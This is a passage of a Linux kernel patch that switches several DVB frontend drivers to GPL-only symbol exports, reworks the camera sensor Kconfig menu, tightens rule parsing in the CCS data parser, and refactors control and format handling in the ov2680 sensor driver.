++EXPORT_SYMBOL_GPL(tda8261_attach);
+ 
+ MODULE_AUTHOR("Manu Abraham");
+ MODULE_DESCRIPTION("TDA8261 8PSK/QPSK Tuner");
+diff --git a/drivers/media/dvb-frontends/tda826x.c b/drivers/media/dvb-frontends/tda826x.c
+index f9703a1dd758c..eafcf5f7da3dc 100644
+--- a/drivers/media/dvb-frontends/tda826x.c
++++ b/drivers/media/dvb-frontends/tda826x.c
+@@ -164,7 +164,7 @@ struct dvb_frontend *tda826x_attach(struct dvb_frontend *fe, int addr, struct i2
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(tda826x_attach);
++EXPORT_SYMBOL_GPL(tda826x_attach);
+ 
+ module_param(debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/ts2020.c b/drivers/media/dvb-frontends/ts2020.c
+index 02338256b974f..2f64f1a8bc233 100644
+--- a/drivers/media/dvb-frontends/ts2020.c
++++ b/drivers/media/dvb-frontends/ts2020.c
+@@ -525,7 +525,7 @@ struct dvb_frontend *ts2020_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(ts2020_attach);
++EXPORT_SYMBOL_GPL(ts2020_attach);
+ 
+ /*
+  * We implement own regmap locking due to legacy DVB attach which uses frontend
+diff --git a/drivers/media/dvb-frontends/tua6100.c b/drivers/media/dvb-frontends/tua6100.c
+index 2483f614d0e7d..41dd9b6d31908 100644
+--- a/drivers/media/dvb-frontends/tua6100.c
++++ b/drivers/media/dvb-frontends/tua6100.c
+@@ -186,7 +186,7 @@ struct dvb_frontend *tua6100_attach(struct dvb_frontend *fe, int addr, struct i2
+ 	fe->tuner_priv = priv;
+ 	return fe;
+ }
+-EXPORT_SYMBOL(tua6100_attach);
++EXPORT_SYMBOL_GPL(tua6100_attach);
+ 
+ MODULE_DESCRIPTION("DVB tua6100 driver");
+ MODULE_AUTHOR("Andrew de Quincey");
+diff --git a/drivers/media/dvb-frontends/ves1820.c b/drivers/media/dvb-frontends/ves1820.c
+index 9df14d0be1c1a..ee5620e731e9b 100644
+--- a/drivers/media/dvb-frontends/ves1820.c
++++ b/drivers/media/dvb-frontends/ves1820.c
+@@ -434,4 +434,4 @@ MODULE_DESCRIPTION("VLSI VES1820 DVB-C Demodulator driver");
+ MODULE_AUTHOR("Ralph Metzler, Holger Waechtler");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(ves1820_attach);
++EXPORT_SYMBOL_GPL(ves1820_attach);
+diff --git a/drivers/media/dvb-frontends/ves1x93.c b/drivers/media/dvb-frontends/ves1x93.c
+index b747272863025..c60e21d26b881 100644
+--- a/drivers/media/dvb-frontends/ves1x93.c
++++ b/drivers/media/dvb-frontends/ves1x93.c
+@@ -540,4 +540,4 @@ MODULE_DESCRIPTION("VLSI VES1x93 DVB-S Demodulator driver");
+ MODULE_AUTHOR("Ralph Metzler");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(ves1x93_attach);
++EXPORT_SYMBOL_GPL(ves1x93_attach);
+diff --git a/drivers/media/dvb-frontends/zl10036.c b/drivers/media/dvb-frontends/zl10036.c
+index d392c7cce2ce0..7ba575e9c55f4 100644
+--- a/drivers/media/dvb-frontends/zl10036.c
++++ b/drivers/media/dvb-frontends/zl10036.c
+@@ -496,7 +496,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(zl10036_attach);
++EXPORT_SYMBOL_GPL(zl10036_attach);
+ 
+ module_param_named(debug, zl10036_debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/zl10039.c b/drivers/media/dvb-frontends/zl10039.c
+index 1335bf78d5b7f..a3e4d219400ce 100644
+--- a/drivers/media/dvb-frontends/zl10039.c
++++ b/drivers/media/dvb-frontends/zl10039.c
+@@ -295,7 +295,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(zl10039_attach);
++EXPORT_SYMBOL_GPL(zl10039_attach);
+ 
+ module_param(debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/zl10353.c b/drivers/media/dvb-frontends/zl10353.c
+index 2a2cf20a73d61..8849d05475c27 100644
+--- a/drivers/media/dvb-frontends/zl10353.c
++++ b/drivers/media/dvb-frontends/zl10353.c
+@@ -665,4 +665,4 @@ MODULE_DESCRIPTION("Zarlink ZL10353 DVB-T demodulator driver");
+ MODULE_AUTHOR("Chris Pascoe");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(zl10353_attach);
++EXPORT_SYMBOL_GPL(zl10353_attach);
+diff --git a/drivers/media/i2c/Kconfig b/drivers/media/i2c/Kconfig
+index 7806d4b81716e..a34afb5217ebc 100644
+--- a/drivers/media/i2c/Kconfig
++++ b/drivers/media/i2c/Kconfig
+@@ -25,8 +25,15 @@ config VIDEO_IR_I2C
+ # V4L2 I2C drivers that are related with Camera support
+ #
+ 
+-menu "Camera sensor devices"
+-	visible if MEDIA_CAMERA_SUPPORT
++menuconfig VIDEO_CAMERA_SENSOR
++	bool "Camera sensor devices"
++	depends on MEDIA_CAMERA_SUPPORT && I2C
++	select MEDIA_CONTROLLER
++	select V4L2_FWNODE
++	select VIDEO_V4L2_SUBDEV_API
++	default y
++
++if VIDEO_CAMERA_SENSOR
+ 
+ config VIDEO_APTINA_PLL
+ 	tristate
+@@ -783,7 +790,7 @@ source "drivers/media/i2c/ccs/Kconfig"
+ source "drivers/media/i2c/et8ek8/Kconfig"
+ source "drivers/media/i2c/m5mols/Kconfig"
+ 
+-endmenu
++endif
+ 
+ menu "Lens drivers"
+ 	visible if MEDIA_CAMERA_SUPPORT
+diff --git a/drivers/media/i2c/ad5820.c b/drivers/media/i2c/ad5820.c
+index a12fedcc3a1ce..088c29c4e2529 100644
+--- a/drivers/media/i2c/ad5820.c
++++ b/drivers/media/i2c/ad5820.c
+@@ -356,7 +356,6 @@ static void ad5820_remove(struct i2c_client *client)
+ static const struct i2c_device_id ad5820_id_table[] = {
+ 	{ "ad5820", 0 },
+ 	{ "ad5821", 0 },
+-	{ "ad5823", 0 },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(i2c, ad5820_id_table);
+@@ -364,7 +363,6 @@ MODULE_DEVICE_TABLE(i2c, ad5820_id_table);
+ static const struct of_device_id ad5820_of_table[] = {
+ 	{ .compatible = "adi,ad5820" },
+ 	{ .compatible = "adi,ad5821" },
+-	{ .compatible = "adi,ad5823" },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(of, ad5820_of_table);
+diff --git a/drivers/media/i2c/ccs/ccs-data.c b/drivers/media/i2c/ccs/ccs-data.c
+index 45f2b2f55ec5c..08400edf77ced 100644
+--- a/drivers/media/i2c/ccs/ccs-data.c
++++ b/drivers/media/i2c/ccs/ccs-data.c
+@@ -464,8 +464,7 @@ static int ccs_data_parse_rules(struct bin_container *bin,
+ 		rule_payload = __rule_type + 1;
+ 		rule_plen2 = rule_plen - sizeof(*__rule_type);
+ 
+-		switch (*__rule_type) {
+-		case CCS_DATA_BLOCK_RULE_ID_IF: {
++		if (*__rule_type == CCS_DATA_BLOCK_RULE_ID_IF) {
+ 			const struct __ccs_data_block_rule_if *__if_rules =
+ 				rule_payload;
+ 			const size_t __num_if_rules =
+@@ -514,49 +513,61 @@ static int ccs_data_parse_rules(struct bin_container *bin,
+ 				rules->if_rules = if_rule;
+ 				rules->num_if_rules = __num_if_rules;
+ 			}
+-			break;
+-		}
+-		case CCS_DATA_BLOCK_RULE_ID_READ_ONLY_REGS:
+-			rval = ccs_data_parse_reg_rules(bin, &rules->read_only_regs,
+-							&rules->num_read_only_regs,
+-							rule_payload,
+-							rule_payload + rule_plen2,
+-							dev);
+-			if (rval)
+-				return rval;
+-			break;
+-		case CCS_DATA_BLOCK_RULE_ID_FFD:
+-			rval = ccs_data_parse_ffd(bin, &rules->frame_format,
+-						  rule_payload,
+-						  rule_payload + rule_plen2,
+-						  dev);
+-			if (rval)
+-				return rval;
+-			break;
+-		case CCS_DATA_BLOCK_RULE_ID_MSR:
+-			rval = ccs_data_parse_reg_rules(bin,
+-							&rules->manufacturer_regs,
+-							&rules->num_manufacturer_regs,
+-							rule_payload,
+-							rule_payload + rule_plen2,
+-							dev);
+-			if (rval)
+-				return rval;
+-			break;
+-		case CCS_DATA_BLOCK_RULE_ID_PDAF_READOUT:
+-			rval = ccs_data_parse_pdaf_readout(bin,
+-							   &rules->pdaf_readout,
+-							   rule_payload,
+-							   rule_payload + rule_plen2,
+-							   dev);
+-			if (rval)
+-				return rval;
+-			break;
+-		default:
+-			dev_dbg(dev,
+-				"Don't know how to handle rule type %u!\n",
+-				*__rule_type);
+-			return -EINVAL;
++		} else {
++			/* Check there was an if rule before any other rules */
++			if (bin->base && !rules)
++				return -EINVAL;
++
++			switch (*__rule_type) {
++			case CCS_DATA_BLOCK_RULE_ID_READ_ONLY_REGS:
++				rval = ccs_data_parse_reg_rules(bin,
++								rules ?
++								&rules->read_only_regs : NULL,
++								rules ?
++								&rules->num_read_only_regs : NULL,
++								rule_payload,
++								rule_payload + rule_plen2,
++								dev);
++				if (rval)
++					return rval;
++				break;
++			case CCS_DATA_BLOCK_RULE_ID_FFD:
++				rval = ccs_data_parse_ffd(bin, rules ?
++							  &rules->frame_format : NULL,
++							  rule_payload,
++							  rule_payload + rule_plen2,
++							  dev);
++				if (rval)
++					return rval;
++				break;
++			case CCS_DATA_BLOCK_RULE_ID_MSR:
++				rval = ccs_data_parse_reg_rules(bin,
++								rules ?
++								&rules->manufacturer_regs : NULL,
++								rules ?
++								&rules->num_manufacturer_regs : NULL,
++								rule_payload,
++								rule_payload + rule_plen2,
++								dev);
++				if (rval)
++					return rval;
++				break;
++			case CCS_DATA_BLOCK_RULE_ID_PDAF_READOUT:
++				rval = ccs_data_parse_pdaf_readout(bin,
++								   rules ?
++								   &rules->pdaf_readout : NULL,
++								   rule_payload,
++								   rule_payload + rule_plen2,
++								   dev);
++				if (rval)
++					return rval;
++				break;
++			default:
++				dev_dbg(dev,
++					"Don't know how to handle rule type %u!\n",
++					*__rule_type);
++				return -EINVAL;
++			}
+ 		}
+ 		__next_rule = __next_rule + rule_hlen + rule_plen;
+ 	}
+diff --git a/drivers/media/i2c/ov2680.c b/drivers/media/i2c/ov2680.c
+index de66d3395a4dd..8943e4e78a0df 100644
+--- a/drivers/media/i2c/ov2680.c
++++ b/drivers/media/i2c/ov2680.c
+@@ -54,6 +54,9 @@
+ #define OV2680_WIDTH_MAX		1600
+ #define OV2680_HEIGHT_MAX		1200
+ 
++#define OV2680_DEFAULT_WIDTH			800
++#define OV2680_DEFAULT_HEIGHT			600
++
+ enum ov2680_mode_id {
+ 	OV2680_MODE_QUXGA_800_600,
+ 	OV2680_MODE_720P_1280_720,
+@@ -85,15 +88,8 @@ struct ov2680_mode_info {
+ 
+ struct ov2680_ctrls {
+ 	struct v4l2_ctrl_handler handler;
+-	struct {
+-		struct v4l2_ctrl *auto_exp;
+-		struct v4l2_ctrl *exposure;
+-	};
+-	struct {
+-		struct v4l2_ctrl *auto_gain;
+-		struct v4l2_ctrl *gain;
+-	};
+-
++	struct v4l2_ctrl *exposure;
++	struct v4l2_ctrl *gain;
+ 	struct v4l2_ctrl *hflip;
+ 	struct v4l2_ctrl *vflip;
+ 	struct v4l2_ctrl *test_pattern;
+@@ -143,6 +139,7 @@ static const struct reg_value ov2680_setting_30fps_QUXGA_800_600[] = {
+ 	{0x380e, 0x02}, {0x380f, 0x84}, {0x3811, 0x04}, {0x3813, 0x04},
+ 	{0x3814, 0x31}, {0x3815, 0x31}, {0x3820, 0xc0}, {0x4008, 0x00},
+ 	{0x4009, 0x03}, {0x4837, 0x1e}, {0x3501, 0x4e}, {0x3502, 0xe0},
++	{0x3503, 0x03},
+ };
+ 
+ static const struct reg_value ov2680_setting_30fps_720P_1280_720[] = {
+@@ -321,70 +318,62 @@ static void ov2680_power_down(struct ov2680_dev *sensor)
+ 	usleep_range(5000, 10000);
+ }
+ 
+-static int ov2680_bayer_order(struct ov2680_dev *sensor)
++static void ov2680_set_bayer_order(struct ov2680_dev *sensor,
++				   struct v4l2_mbus_framefmt *fmt)
+ {
+-	u32 format1;
+-	u32 format2;
+-	u32 hv_flip;
+-	int ret;
+-
+-	ret = ov2680_read_reg(sensor, OV2680_REG_FORMAT1, &format1);
+-	if (ret < 0)
+-		return ret;
+-
+-	ret = ov2680_read_reg(sensor, OV2680_REG_FORMAT2, &format2);
+-	if (ret < 0)
+-		return ret;
++	int hv_flip = 0;
+ 
+-	hv_flip = (format2 & BIT(2)  << 1) | (format1 & BIT(2));
++	if (sensor->ctrls.vflip && sensor->ctrls.vflip->val)
++		hv_flip += 1;
+ 
+-	sensor->fmt.code = ov2680_hv_flip_bayer_order[hv_flip];
++	if (sensor->ctrls.hflip && sensor->ctrls.hflip->val)
++		hv_flip += 2;
+ 
+-	return 0;
++	fmt->code = ov2680_hv_flip_bayer_order[hv_flip];
+ }
+ 
+-static int ov2680_vflip_enable(struct ov2680_dev *sensor)
++static void ov2680_fill_format(struct ov2680_dev *sensor,
++			       struct v4l2_mbus_framefmt *fmt,
++			       unsigned int width, unsigned int height)
+ {
+-	int ret;
+-
+-	ret = ov2680_mod_reg(sensor, OV2680_REG_FORMAT1, BIT(2), BIT(2));
+-	if (ret < 0)
+-		return ret;
+-
+-	return ov2680_bayer_order(sensor);
++	memset(fmt, 0, sizeof(*fmt));
++	fmt->width = width;
++	fmt->height = height;
++	fmt->field = V4L2_FIELD_NONE;
++	fmt->colorspace = V4L2_COLORSPACE_SRGB;
++	ov2680_set_bayer_order(sensor, fmt);
+ }
+ 
+-static int ov2680_vflip_disable(struct ov2680_dev *sensor)
++static int ov2680_set_vflip(struct ov2680_dev *sensor, s32 val)
+ {
+ 	int ret;
+ 
+-	ret = ov2680_mod_reg(sensor, OV2680_REG_FORMAT1, BIT(2), BIT(0));
+-	if (ret < 0)
+-		return ret;
+-
+-	return ov2680_bayer_order(sensor);
+-}
+-
+-static int ov2680_hflip_enable(struct ov2680_dev *sensor)
+-{
+-	int ret;
++	if (sensor->is_streaming)
++		return -EBUSY;
+ 
+-	ret = ov2680_mod_reg(sensor, OV2680_REG_FORMAT2, BIT(2), BIT(2));
++	ret = ov2680_mod_reg(sensor, OV2680_REG_FORMAT1,
++			     BIT(2), val ? BIT(2) : 0);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	return ov2680_bayer_order(sensor);
++	ov2680_set_bayer_order(sensor, &sensor->fmt);
++	return 0;
+ }
+ 
+-static int ov2680_hflip_disable(struct ov2680_dev *sensor)
++static int ov2680_set_hflip(struct ov2680_dev *sensor, s32 val)
+ {
+ 	int ret;
+ 
+-	ret = ov2680_mod_reg(sensor, OV2680_REG_FORMAT2, BIT(2), BIT(0));
++	if (sensor->is_streaming)
++		return -EBUSY;
++
++	ret = ov2680_mod_reg(sensor, OV2680_REG_FORMAT2,
++			     BIT(2), val ? BIT(2) : 0);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	return ov2680_bayer_order(sensor);
++	ov2680_set_bayer_order(sensor, &sensor->fmt);
++	return 0;
+ }
+ 
+ static int ov2680_test_pattern_set(struct ov2680_dev *sensor, int value)
+@@ -405,69 +394,15 @@ static int ov2680_test_pattern_set(struct ov2680_dev *sensor, int value)
+ 	return 0;
+ }
+ 
+-static int ov2680_gain_set(struct ov2680_dev *sensor, bool auto_gain)
++static int ov2680_gain_set(struct ov2680_dev *sensor, u32 gain)
+ {
+-	struct ov2680_ctrls *ctrls = &sensor->ctrls;
+-	u32 gain;
+-	int ret;
+-
+-	ret = ov2680_mod_reg(sensor, OV2680_REG_R_MANUAL, BIT(1),
+-			     auto_gain ? 0 : BIT(1));
+-	if (ret < 0)
+-		return ret;
+-
+-	if (auto_gain || !ctrls->gain->is_new)
+-		return 0;
+-
+-	gain = ctrls->gain->val;
+-
+-	ret = ov2680_write_reg16(sensor, OV2680_REG_GAIN_PK, gain);
+-
+-	return 0;
+-}
+-
+-static int ov2680_gain_get(struct ov2680_dev *sensor)
+-{
+-	u32 gain;
+-	int ret;
+-
+-	ret = ov2680_read_reg16(sensor, OV2680_REG_GAIN_PK, &gain);
+-	if (ret)
+-		return ret;
+-
+-	return gain;
+-}
+-
+-static int ov2680_exposure_set(struct ov2680_dev *sensor, bool auto_exp)
+-{
+-	struct ov2680_ctrls *ctrls = &sensor->ctrls;
+-	u32 exp;
+-	int ret;
+-
+-	ret = ov2680_mod_reg(sensor, OV2680_REG_R_MANUAL, BIT(0),
+-			     auto_exp ? 0 : BIT(0));
+-	if (ret < 0)
+-		return ret;
+-
+-	if (auto_exp || !ctrls->exposure->is_new)
+-		return 0;
+-
+-	exp = (u32)ctrls->exposure->val;
+-	exp <<= 4;
+-
+-	return ov2680_write_reg24(sensor, OV2680_REG_EXPOSURE_PK_HIGH, exp);
++	return ov2680_write_reg16(sensor, OV2680_REG_GAIN_PK, gain);
+ }
+ 
+-static int ov2680_exposure_get(struct ov2680_dev *sensor)
++static int ov2680_exposure_set(struct ov2680_dev *sensor, u32 exp)
+ {
+-	int ret;
+-	u32 exp;
+-
+-	ret = ov2680_read_reg24(sensor, OV2680_REG_EXPOSURE_PK_HIGH, &exp);
+-	if (ret)
+-		return ret;
+-
+-	return exp >> 4;
++	return ov2680_write_reg24(sensor, OV2680_REG_EXPOSURE_PK_HIGH,
++				  exp << 4);
+ }
+ 
+ static int ov2680_stream_enable(struct ov2680_dev *sensor)
+@@ -482,33 +417,17 @@ static int ov2680_stream_disable(struct ov2680_dev *sensor)
+ 
+ static int ov2680_mode_set(struct ov2680_dev *sensor)
+ {
+-	struct ov2680_ctrls *ctrls = &sensor->ctrls;
+ 	int ret;
+ 
+-	ret = ov2680_gain_set(sensor, false);
+-	if (ret < 0)
+-		return ret;
+-
+-	ret = ov2680_exposure_set(sensor, false);
++	ret = ov2680_load_regs(sensor, sensor->current_mode);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = ov2680_load_regs(sensor, sensor->current_mode);
++	/* Restore value of all ctrls */
++	ret = __v4l2_ctrl_handler_setup(&sensor->ctrls.handler);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	if (ctrls->auto_gain->val) {
+-		ret = ov2680_gain_set(sensor, true);
+-		if (ret < 0)
+-			return ret;
+-	}
+-
+-	if (ctrls->auto_exp->val == V4L2_EXPOSURE_AUTO) {
+-		ret = ov2680_exposure_set(sensor, true);
+-		if (ret < 0)
+-			return ret;
+-	}
+-
+ 	sensor->mode_pending_changes = false;
+ 
+ 	return 0;
+@@ -556,7 +475,7 @@ static int ov2680_power_on(struct ov2680_dev *sensor)
+ 		ret = ov2680_write_reg(sensor, OV2680_REG_SOFT_RESET, 0x01);
+ 		if (ret != 0) {
+ 			dev_err(dev, "sensor soft reset failed\n");
+-			return ret;
++			goto err_disable_regulators;
+ 		}
+ 		usleep_range(1000, 2000);
+ 	} else {
+@@ -566,7 +485,7 @@ static int ov2680_power_on(struct ov2680_dev *sensor)
+ 
+ 	ret = clk_prepare_enable(sensor->xvclk);
+ 	if (ret < 0)
+-		return ret;
++		goto err_disable_regulators;
+ 
+ 	sensor->is_enabled = true;
+ 
+@@ -576,6 +495,10 @@ static int ov2680_power_on(struct ov2680_dev *sensor)
+ 	ov2680_stream_disable(sensor);
+ 
+ 	return 0;
++
++err_disable_regulators:
++	regulator_bulk_disable(OV2680_NUM_SUPPLIES, sensor->supplies);
++	return ret;
+ }
+ 
+ static int ov2680_s_power(struct v4l2_subdev *sd, int on)
+@@ -590,15 +513,10 @@ static int ov2680_s_power(struct v4l2_subdev *sd, int on)
+ 	else
+ 		ret = ov2680_power_off(sensor);
+ 
+-	mutex_unlock(&sensor->lock);
+-
+-	if (on && ret == 0) {
+-		ret = v4l2_ctrl_handler_setup(&sensor->ctrls.handler);
+-		if (ret < 0)
+-			return ret;
+-
++	if (on && ret == 0)
+ 		ret = ov2680_mode_restore(sensor);
+-	}
++
++	mutex_unlock(&sensor->lock);
+ 
+ 	return ret;
+ }
+@@ -664,7 +582,6 @@ static int ov2680_get_fmt(struct v4l2_subdev *sd,
+ {
+ 	struct ov2680_dev *sensor = to_ov2680_dev(sd);
+ 	struct v4l2_mbus_framefmt *fmt = NULL;
+-	int ret = 0;
+ 
+ 	if (format->pad != 0)
+ 		return -EINVAL;
+@@ -672,22 +589,17 @@ static int ov2680_get_fmt(struct v4l2_subdev *sd,
+ 	mutex_lock(&sensor->lock);
+ 
+ 	if (format->which == V4L2_SUBDEV_FORMAT_TRY) {
+-#ifdef CONFIG_VIDEO_V4L2_SUBDEV_API
+ 		fmt = v4l2_subdev_get_try_format(&sensor->sd, sd_state,
+ 						 format->pad);
+-#else
+-		ret = -EINVAL;
+-#endif
+ 	} else {
+ 		fmt = &sensor->fmt;
+ 	}
+ 
+-	if (fmt)
+-		format->format = *fmt;
++	format->format = *fmt;
+ 
+ 	mutex_unlock(&sensor->lock);
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static int ov2680_set_fmt(struct v4l2_subdev *sd,
+@@ -695,43 +607,35 @@ static int ov2680_set_fmt(struct v4l2_subdev *sd,
+ 			  struct v4l2_subdev_format *format)
+ {
+ 	struct ov2680_dev *sensor = to_ov2680_dev(sd);
+-	struct v4l2_mbus_framefmt *fmt = &format->format;
+-#ifdef CONFIG_VIDEO_V4L2_SUBDEV_API
+ 	struct v4l2_mbus_framefmt *try_fmt;
+-#endif
+ 	const struct ov2680_mode_info *mode;
+ 	int ret = 0;
+ 
+ 	if (format->pad != 0)
+ 		return -EINVAL;
+ 
+-	mutex_lock(&sensor->lock);
+-
+-	if (sensor->is_streaming) {
+-		ret = -EBUSY;
+-		goto unlock;
+-	}
+-
+ 	mode = v4l2_find_nearest_size(ov2680_mode_data,
+-				      ARRAY_SIZE(ov2680_mode_data), width,
+-				      height, fmt->width, fmt->height);
+-	if (!mode) {
+-		ret = -EINVAL;
+-		goto unlock;
+-	}
++				      ARRAY_SIZE(ov2680_mode_data),
++				      width, height,
++				      format->format.width,
++				      format->format.height);
++	if (!mode)
++		return -EINVAL;
++
++	ov2680_fill_format(sensor, &format->format, mode->width, mode->height);
+ 
+ 	if (format->which == V4L2_SUBDEV_FORMAT_TRY) {
+-#ifdef CONFIG_VIDEO_V4L2_SUBDEV_API
+ 		try_fmt = v4l2_subdev_get_try_format(sd, sd_state, 0);
+-		format->format = *try_fmt;
+-#endif
+-		goto unlock;
++		*try_fmt = format->format;
++		return 0;
+ 	}
+ 
+-	fmt->width = mode->width;
+-	fmt->height = mode->height;
+-	fmt->code = sensor->fmt.code;
+-	fmt->colorspace = sensor->fmt.colorspace;
++	mutex_lock(&sensor->lock);
++
++	if (sensor->is_streaming) {
++		ret = -EBUSY;
++		goto unlock;
++	}
+ 
+ 	sensor->current_mode = mode;
+ 	sensor->fmt = format->format;
+@@ -746,16 +650,11 @@ unlock:
+ static int ov2680_init_cfg(struct v4l2_subdev *sd,
+ 			   struct v4l2_subdev_state *sd_state)
+ {
+-	struct v4l2_subdev_format fmt = {
+-		.which = sd_state ? V4L2_SUBDEV_FORMAT_TRY
+-		: V4L2_SUBDEV_FORMAT_ACTIVE,
+-		.format = {
+-			.width = 800,
+-			.height = 600,
+-		}
+-	};
++	struct ov2680_dev *sensor = to_ov2680_dev(sd);
+ 
+-	return ov2680_set_fmt(sd, sd_state, &fmt);
++	ov2680_fill_format(sensor, &sd_state->pads[0].try_fmt,
++			   OV2680_DEFAULT_WIDTH, OV2680_DEFAULT_HEIGHT);
++	return 0;
+ }
+ 
+ static int ov2680_enum_frame_size(struct v4l2_subdev *sd,
+@@ -794,66 +693,23 @@ static int ov2680_enum_frame_interval(struct v4l2_subdev *sd,
+ 	return 0;
+ }
+ 
+-static int ov2680_g_volatile_ctrl(struct v4l2_ctrl *ctrl)
+-{
+-	struct v4l2_subdev *sd = ctrl_to_sd(ctrl);
+-	struct ov2680_dev *sensor = to_ov2680_dev(sd);
+-	struct ov2680_ctrls *ctrls = &sensor->ctrls;
+-	int val;
+-
+-	if (!sensor->is_enabled)
+-		return 0;
+-
+-	switch (ctrl->id) {
+-	case V4L2_CID_GAIN:
+-		val = ov2680_gain_get(sensor);
+-		if (val < 0)
+-			return val;
+-		ctrls->gain->val = val;
+-		break;
+-	case V4L2_CID_EXPOSURE:
+-		val = ov2680_exposure_get(sensor);
+-		if (val < 0)
+-			return val;
+-		ctrls->exposure->val = val;
+-		break;
+-	}
+-
+-	return 0;
+-}
+-
+ static int ov2680_s_ctrl(struct v4l2_ctrl *ctrl)
+ {
+ 	struct v4l2_subdev *sd = ctrl_to_sd(ctrl);
+ 	struct ov2680_dev *sensor = to_ov2680_dev(sd);
+-	struct ov2680_ctrls *ctrls = &sensor->ctrls;
+ 
+ 	if (!sensor->is_enabled)
+ 		return 0;
+ 
+ 	switch (ctrl->id) {
+-	case V4L2_CID_AUTOGAIN:
+-		return ov2680_gain_set(sensor, !!ctrl->val);
+ 	case V4L2_CID_GAIN:
+-		return ov2680_gain_set(sensor, !!ctrls->auto_gain->val);
+-	case V4L2_CID_EXPOSURE_AUTO:
+-		return ov2680_exposure_set(sensor, !!ctrl->val);
++		return ov2680_gain_set(sensor, ctrl->val);
+ 	case V4L2_CID_EXPOSURE:
+-		return ov2680_exposure_set(sensor, !!ctrls->auto_exp->val);
++		return ov2680_exposure_set(sensor, ctrl->val);
+ 	case V4L2_CID_VFLIP:
+-		if (sensor->is_streaming)
+-			return -EBUSY;
+-		if (ctrl->val)
+-			return ov2680_vflip_enable(sensor);
+-		else
+-			return ov2680_vflip_disable(sensor);
++		return ov2680_set_vflip(sensor, ctrl->val);
+ 	case V4L2_CID_HFLIP:
+-		if (sensor->is_streaming)
+-			return -EBUSY;
+-		if (ctrl->val)
+-			return ov2680_hflip_enable(sensor);
+-		else
+-			return ov2680_hflip_disable(sensor);
++		return ov2680_set_hflip(sensor, ctrl->val);
+ 	case V4L2_CID_TEST_PATTERN:
+ 		return ov2680_test_pattern_set(sensor, ctrl->val);
+ 	default:
+@@ -864,7 +720,6 @@ static int ov2680_s_ctrl(struct v4l2_ctrl *ctrl)
+ }
+ 
+ static const struct v4l2_ctrl_ops ov2680_ctrl_ops = {
+-	.g_volatile_ctrl = ov2680_g_volatile_ctrl,
+ 	.s_ctrl = ov2680_s_ctrl,
+ };
+ 
+@@ -898,11 +753,8 @@ static int ov2680_mode_init(struct ov2680_dev *sensor)
+ 	const struct ov2680_mode_info *init_mode;
+ 
+ 	/* set initial mode */
+-	sensor->fmt.code = MEDIA_BUS_FMT_SBGGR10_1X10;
+-	sensor->fmt.width = 800;
+-	sensor->fmt.height = 600;
+-	sensor->fmt.field = V4L2_FIELD_NONE;
+-	sensor->fmt.colorspace = V4L2_COLORSPACE_SRGB;
++	ov2680_fill_format(sensor, &sensor->fmt,
++			   OV2680_DEFAULT_WIDTH, OV2680_DEFAULT_HEIGHT);
+ 
+ 	sensor->frame_interval.denominator = OV2680_FRAME_RATE;
+ 	sensor->frame_interval.numerator = 1;
+@@ -926,9 +778,7 @@ static int ov2680_v4l2_register(struct ov2680_dev *sensor)
+ 	v4l2_i2c_subdev_init(&sensor->sd, sensor->i2c_client,
+ 			     &ov2680_subdev_ops);
+ 
+-#ifdef CONFIG_VIDEO_V4L2_SUBDEV_API
+ 	sensor->sd.flags = V4L2_SUBDEV_FL_HAS_DEVNODE;
+-#endif
+ 	sensor->pad.flags = MEDIA_PAD_FL_SOURCE;
+ 	sensor->sd.entity.function = MEDIA_ENT_F_CAM_SENSOR;
+ 
+@@ -936,7 +786,7 @@ static int ov2680_v4l2_register(struct ov2680_dev *sensor)
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	v4l2_ctrl_handler_init(hdl, 7);
++	v4l2_ctrl_handler_init(hdl, 5);
+ 
+ 	hdl->lock = &sensor->lock;
+ 
+@@ -948,16 +798,9 @@ static int ov2680_v4l2_register(struct ov2680_dev *sensor)
+ 					ARRAY_SIZE(test_pattern_menu) - 1,
+ 					0, 0, test_pattern_menu);
+ 
+-	ctrls->auto_exp = v4l2_ctrl_new_std_menu(hdl, ops,
+-						 V4L2_CID_EXPOSURE_AUTO,
+-						 V4L2_EXPOSURE_MANUAL, 0,
+-						 V4L2_EXPOSURE_AUTO);
+-
+ 	ctrls->exposure = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_EXPOSURE,
+ 					    0, 32767, 1, 0);
+ 
+-	ctrls->auto_gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_AUTOGAIN,
+-					     0, 1, 1, 1);
+ 	ctrls->gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_GAIN, 0, 2047, 1, 0);
+ 
+ 	if (hdl->error) {
+@@ -965,11 +808,8 @@ static int ov2680_v4l2_register(struct ov2680_dev *sensor)
+ 		goto cleanup_entity;
+ 	}
+ 
+-	ctrls->gain->flags |= V4L2_CTRL_FLAG_VOLATILE;
+-	ctrls->exposure->flags |= V4L2_CTRL_FLAG_VOLATILE;
+-
+-	v4l2_ctrl_auto_cluster(2, &ctrls->auto_gain, 0, true);
+-	v4l2_ctrl_auto_cluster(2, &ctrls->auto_exp, 1, true);
++	ctrls->vflip->flags |= V4L2_CTRL_FLAG_MODIFY_LAYOUT;
++	ctrls->hflip->flags |= V4L2_CTRL_FLAG_MODIFY_LAYOUT;
+ 
+ 	sensor->sd.ctrl_handler = hdl;
+ 
